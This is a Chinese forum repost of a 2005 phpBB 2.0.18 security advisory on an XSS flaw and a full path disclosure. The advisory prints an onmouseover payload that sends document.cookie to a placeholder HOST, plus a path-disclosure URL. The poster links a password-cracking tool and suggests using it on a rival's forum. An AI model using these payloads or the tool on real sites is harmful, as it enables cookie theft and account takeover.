phpBB论坛程序:遇见新问题

所属分类: 实用技巧 / 漏洞研究 阅读数: 223
收藏 0 赞 0 分享

phpBB 2.0.18 XSS and Full Path Disclosure 

Details: SecurityAlert   

还有一个是工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码 

下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar 
     Topic : phpBB 2.0.18 XSS and Full Path Disclosure 
  
    SecurityAlert Id : 269 
  
     SecurityRisk : Low 
  
     Remote Exploit : Yes 
  
     Local Exploit : No 
  
     Exploit Given : Yes 
  
     Credit : Maksymilian Arciemowicz 
  
     Date : 17.12.2005  

  Affected Software :  phpBB <= 2.0.18  

  Advisory Text : 

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1 

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] 

Author: Maksymilian Arciemowicz (cXIb8O3) 
Date: 16.12.2005 
from securityreason.com TEAM 

- --- 0.Description --- 
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar 
d package. phpBB has a user-friendly interface, simple and straightforward administration  
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL 
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so 
lution for all web sites. 
Contact with author http://www.phpbb.com/about.php. 

- --- 1. XSS --- 
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al 
low HTML: YES" or are you Guest 

that you can use this tags: 

<B C=">" onmouseover="alert(’SecurityReason.Com’)" X="<B "> H E L O </B> 

Exploit: 

<B C=">" onmouseover="alert(document.location=’http://HOST/cookies?’+document.cookie) 
" X="<B "> H A L O </B> 

and have you cookies. 

- --- 2. Full Path Disclosure --- 
In file admin/admin_disallow.php is 

- -25-31--- 
if( !empty($setmodules) ) 

$filename = basename(__FILE__); 
$module[’Users’][’Disallow’] = append_sid($filename); 

return; 

- -25-31--- 

function append_sid() dosen’t exists. And if you have: 

register_globals = On 
display_errors = On 

Try to go: 
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 

- -RESULT ERROR--- 
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa 
llow.php on line 28 
- -RESULT ERROR--- 

- --- 3. Greets --- 
sp3x 

- --- 4.Contact --- 
Author: Maksymilian Arciemowicz < cXIb8O3 > 
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com 
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg 
securityreason.com TEAM 
-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1.4.2 (FreeBSD) 

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D 
/0u14EN2sQAh1Bwu0yvT48Q= 
=lsL8 
-----END PGP SIGNATURE----- 

哦,对了, 最上面那个好象也许大概似乎我猜是这个意思: 

个性签名: 
您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。 

禁止HTML标签 
允许风格标签 
允许表情图标 

找到可以“允许HTML标签” 

更多精彩内容其他人还在看

MySQL Proxy(解决注入的另一思路)

MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0 赞 0 分享

phpwind管理权限泄露漏洞利用程序发布

phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
收藏 0 赞 0 分享

分析NtGodMode.exe干了什么

NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0 赞 0 分享

伯乐asp收信程序漏洞及利用程序利用代码

信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 文章作者:fhod 发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0 赞 0 分享

字符集导致的浏览器跨站脚本攻击分析

前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0 赞 0 分享

Search Engine XSS Worm

作者:余弦 来源:0x37 Security 有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0 赞 0 分享

CPU也有远程攻击漏洞 英特尔匆匆修补

BEAREYES.COM 北京 [ 翻译 ] 作者:1000years 日期:2008年08月12日
收藏 0 赞 0 分享

暂时屏蔽 IE 最新 0day的4 种方法

IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0 赞 0 分享

Sql Server 应用程序的高级Sql注入第1/2页

这篇文章讨论常用的"sql注入"技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。
收藏 0 赞 0 分享

ASP木马后门新思路

ASP木马后门新思路
收藏 0 赞 0 分享
查看更多